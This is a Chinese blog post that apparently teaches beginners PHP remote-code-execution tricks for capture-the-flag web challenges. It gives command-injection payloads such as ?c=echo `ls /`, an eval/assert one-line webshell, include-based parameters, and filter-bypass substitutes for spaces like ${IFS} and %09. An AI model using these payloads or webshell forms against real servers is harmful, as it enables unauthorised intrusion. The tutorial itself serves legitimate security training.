CTF php RCE (一)

最新推荐文章于 2024-08-02 23:22:56 发布
最新推荐文章于 2024-08-02 23:22:56 发布
阅读量498 收藏 9
点赞数 10
分类专栏: web CTF 基础 文章标签: php 开发语言 web安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/140275610
版权

0x01 引言

首先进入题目 应该是大部分都是一段白盒PHP审计,然后我们为了命令执行,绕过或者是钻空子等等操作,来拿到flag

0x02 基础

0x01 传参方式

这里有两个工具,hackbar和burpsuite,这两个工具非常实用
在这里插入图片描述
在这里插入图片描述
大家可以自己Google或者百度搜索安装,安装包的话,私信我可以给你哦
常见的就是GET和POST传参

通俗点讲的话GET 传参就是在url(链接后面拼接键值对)

键值对我也讲不明白
就是c=1 这里的 c 是键,1 是值

例子

url/?c=echo `ls /`;

POST 的话我们就要打开post传参方式
在这里插入图片描述
在BP中我们右键,然后选择change request method即可进行切换

在这里插入图片描述
这里的特点是hackbar的POST不能直接传值,只能传键值对,bp可以直接传值
而且有时候如果你使用hackbar进行传参的话没有反应(就是没有传上去的感觉payload没有改变),那么我建议你进行url编码,如果还没有反应那么再编

0x02 常用函数和命令

首先最常用的应该是弹了吧,好吧也不是那么的常用,但是在比较方便的场面我觉得还是相当好用的,可以看我写的那篇弹shellblog,看看基础命令

函数

在这里插入图片描述
其实我在很多博客中看到说不算function,但是我觉得吧,还行,反正就是命令执行的简介吧,你一看到eval你就知道这题是RCE,主要就是写🐎常用

assert()
有些版本比如7.0,
直接写<?php  ?>并不好使,或者说被禁用了php那么可以这么写🐎
我们需要调用eval拼接为assert(eval($_POST[a]))

system
passthru
这两个函数相当常用
system('ls /');
system("ls /");
这二者有时候可能结果一样,但是其内涵不同,而且有时候单引号能触发,但是双引号不一定能触发,所以多多尝试

php -r 'echo `ls`;'
开启php引擎,进行命令执行

这几种都会使用到分号 ,
所以也出现了include包含来面对这种东西

include$_GET["cmd"]?>
include$_POST["cmd"]?>
然后cmd传日志文件传马或者是php伪协议外带文件内容

?><?=`ls` 等同于system

0x03 空格绕过

%09(tab)
${IFS}
$IFS$1
${IFS}$1       //这后面的数字随便0-9都可以只是
%09 (空格)
%0a     (回车)
\x20     (空格)
<>
<
baozongwi
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF-WEB入门DOC-2019版1
08-03
5. PHP漏洞:学习PHP基础和相关漏洞,如变量覆盖、文件包含、反序列化、RCE等。 6. Python漏洞:研究Flask SSTI、pickle反序列化等。 7. XXE:理解XXE漏洞原理,通过xxe-lab实践。 8. Java漏洞:掌握Java反序列化...
PbootCms-3.04前台RCE挖掘过程1
08-03
在其3.04版本中发现了一个远程代码执行(Remote Code Execution, RCE)的安全漏洞。此漏洞允许攻击者在未授权的情况下向系统注入并执行任意PHP代码。本文档基于一篇详细介绍了该漏洞挖掘过程的文章进行总结,并深入...
RCEphp文件上传
m0_71332744的博客
07-30 814
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 312
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 502
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP一维数组怎么转关联数组
qq_32450471的博客
07-30 315
php是一门广泛应用于web开发的脚本语言。其强大的数组功能是其最重要的特征之一。在PHP中,数组是一个能够存储多个值的变量,并且这些值可以是任何类型的数据,比如整数、浮点数、字符串、布尔值、对象等等。此外,数组还可以分为索引数组和关联数组。本文主要介绍PHP中一维数组转关联数组的方法。
基于PHP+MySQL组合开发的微信活动投票小程序源码系统 带完整的安装代码包以及搭建部署教程
codeji的博客
07-31 240
为了满足这一需求,我们推出了一款基于PHP+MySQL组合开发的微信活动投票小程序源码系统,旨在帮助用户快速搭建和管理投票活动。该系统采用了PHP作为后端开发语言,结合MySQL数据库进行数据存储和管理,确保了系统的稳定性和可扩展性。同时,通过优化数据库查询和索引设计,提高了数据处理的效率,确保了在大量用户同时参与投票时系统的稳定运行。同时,系统还支持多种交互方式,如分享、评论等,增强了用户的参与感和互动性。同时,管理员可以自定义投票选项、设定投票时间、限制投票次数等,确保活动的灵活性和公平性。
深入探索:使用PHP开发保利威Polyv云点播服务器API对接实践(一)(点播服务器 API、视频加密、跑马灯防录屏、自定义用户)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-01 465
屏幕录像是最难防范的一种视频盗版方式,保利威播放器提供的防录屏跑马灯功能,通过设定文字内容(一般是观众的身份ID信息)在视频上不规则滚动,以此来警示盗版者,达到视频版权保护的效果。另外在用户网站中,除了通过登录信息(cookies)验证观众是否有权限访问视频播放页面外,还可以通过保利威播放器验证观众是否有播放某一个视频的权限,从而实现对观众权限的双重验证。保利威接口请求方式,包含post和get两种方式,因此,需要做好两种请求方式的封装函数。
如何排查和解决PHP连接数据库MYSQL失败写锁的问题
qq_33665793的博客
07-30 973
并把此服务器加入到定期排查的服务器集合中,因此服务器当时是使用的分公司购买的,所以遗漏了。本文将介绍一些常见的排查步骤和解决方法,帮助开发者快速定位和解决PHP连接数据库失败的问题。首先,确保你的PHP代码中的数据库连接凭据(主机名、用户名、密码、数据库名)是正确的。- **Ping命令**:从Web服务器上执行ping命令,检查是否能够成功到达数据库服务器。- **数据库名错误**:确认连接时使用了正确的数据库名称。- **主机名错误**:确保使用正确的主机名或IP地址。
应急靶场(11):【玄机】日志分析-apache日志分析
OneMoreThink
07-30 449
题目提交当天访问次数最多的IP,即黑客IP黑客使用的浏览器指纹是什么,提交指纹的md5查看index.php页面被访问的次数,提交次数查看黑客IP访问了多少次,提交次数查看2023年8月03日8时这一个小时内有多少IP访问,提交次数靶场地址:https://xj.edisec.net/challenges/291、提交当天访问次数最多的IP,即黑客IP已知中间件是Linux上的Apache,常见日...
xss漏洞(二,xss入靶场搭建以及简单利用)
最新发布
2302_80280669的博客
08-02 140
使用工具:PHP study,dvwa靶场。
easyadmin layui js监听返回结果,进行token验证防止连点
weixin_43652106的博客
07-29 283
easyadmin layui js监听返回结果,进行token验证防止连点
XXE-lab-master靶场:PHP_xxe
weixin_68416970的博客
07-30 573
XXE-lab-master:PHP_xxe的练习教程
PHP智能问诊导诊平台-计算机毕业设计源码75056
vx_Biye_Design的博客
08-02 216
摘 要 智能问诊导诊平台作为一种智能化医疗服务工具,利用PHP语言开发,旨在为用户提供便捷的在线问诊和导诊服务。该平台集成了智能算法和医疗数据,实现了智能化的病情诊断和治疗建议,帮助用户更快速地获取医疗信息和建议。用户可以通过平台进行在线问诊,查看医院新闻,浏览医生信息,管理个人账户和挂号信息。管理员可以通过后台管理系统管理用户信息、医生信息、挂号信息等,保障平台的正常运行和信息安全。医生用户可登录平台,管理个人信息,处理挂号信息和诊断信息,提供专业的医疗服务。
vulhub:Apache解析漏洞apache_parsing
weixin_68416970的博客
08-01 316
vulhub漏洞复现:Apache解析漏洞apache_parsing
漏洞打靶-tomato
C233333235的博客
07-29 383
由此可知,这个页面存在文件包含漏洞,于是我们就可以利用报错连接2211,将一句话木马当作我们连接的用户名,然后随便输入一个密码,当他显示错误时,我们登录的记录就会被保存在靶场的日志文件中,然后被带入文件包含漏洞中当作php语句执行,步骤如下。21和80就不用说了,我们可以试一试2211和8888端口,首先,8888端口访问后会出现一个登录框,但是我们不知道账号和密码,登陆不进去,而2211是ssh的远程连接端口,通过这个我们可以用别的计算机去连接靶机,但是也是需要密码的。
ctfhub RCE
08-18
CTFHub RCE(Remote Code Execution)是指在CTFHub平台上利用漏洞或安全问题,远程执行恶意代码或命令的攻击行为。这种攻击通常会利用软件或网站存在的漏洞,通过远程执行代码来获取非授权的访问权限或对系统进行控制。 请注意,RCE是一种非法的攻击行为,严重侵犯了他人的隐私和系统安全。在任何情况下,我都不能提供关于如何进行RCE攻击的具体指导或支持。如果您对CTFHub或其他相关安全问题有任何合法的疑问或需求,请提供更具体的信息,我将尽力帮助您。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值